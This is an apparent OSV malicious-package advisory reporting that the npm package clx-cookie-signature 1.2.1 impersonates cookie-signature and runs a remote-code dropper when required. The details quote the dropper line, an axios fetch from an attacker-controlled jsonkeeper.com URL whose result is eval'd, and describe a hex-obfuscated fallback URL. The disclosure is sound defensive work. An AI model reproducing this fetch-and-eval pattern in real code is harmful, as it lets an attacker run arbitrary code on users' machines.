{"id":"MAL-2026-6141","summary":"Malicious code in clx-cookie-signature (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3)\nPackage impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk \u003ctj@learnboost.com\u003e', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues `require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r =\u003e { eval(r.data.content_o); })`, eval'ing whatever JSON the author currently hosts at that URL. A helper `g()` (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.\n","modified":"2026-06-18T23:16:47.847150441Z","published":"2026-06-18T22:28:34Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.2.1"],"sha256":"9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3","modified_time":"2026-06-18T22:28:34Z","id":"IN-MAL-2026-007036","import_time":"2026-06-18T23:09:38.765876167Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/clx-cookie-signature/v/1.2.1"}],"affected":[{"package":{"name":"clx-cookie-signature","ecosystem":"npm","purl":"pkg:npm/clx-cookie-signature"},"versions":["1.2.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/clx-cookie-signature/MAL-2026-6141.json","indicators":{"evidence_files":[{"path":"index.js","tlsh":"663155137ea5d01712b121b3b1f3cc47fd6695601b9a46e0bb6454943ded6b28f30ed8","sha256":"9eb97dcae23527bc66606235e0ad5d2c89692d311120dec3a636acf479e53047"},{"path":"package.json","tlsh":"02f04c1795685d7706fc5395f8640247b6125f1f00b48c0f36ba522c576745707a8f7a","sha256":"e82be7eb22a7cdb806c21d601fdbcf7199f908945bb118c22d86c7d031b6c12d"}],"package_integrity":[{"filename":"clx-cookie-signature-1.2.1.tgz","hashes":{"sha1":"16a98bcda5b9b2178845a07df756ec788cdfed6e","sha512_sri":"sha512-spfhApPggc7s8hRJAXMlnJGLYJQ3iqqCUpvmTu/dkos6z3hRvV1x3DUQaFq3TAPkq1kpmDQF5BOga2ILgEG7vg=="}}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}